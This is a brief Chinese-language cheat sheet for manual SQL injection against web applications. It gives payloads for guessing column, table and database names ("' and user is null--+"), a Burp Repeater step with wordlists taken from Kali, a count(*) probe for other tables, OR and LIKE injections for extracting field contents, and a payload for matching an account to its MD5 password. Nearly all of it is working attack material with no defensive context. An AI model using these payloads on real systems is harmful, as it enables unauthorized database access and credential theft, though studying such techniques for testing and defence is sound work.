1. 列名、表名、庫名
' and user is null--+
' and table.user is null--+
' and db.table.user is null--+
用burp截獲http GET請求,發送到repeater,變量加$, load字典(字典可從kali中獲取(find / -name *column*.txt))
' and (select count(*) from table)>0--+ //猜數據庫裏其它的表
2. 字段內容
' or user = 'admin+ //user字段,user是通過猜列名得到的正確結果
' or user like '%a% //構造SQL模糊查詢語句
3. 猜賬號對應密碼
' or user='admin' and password='MD5值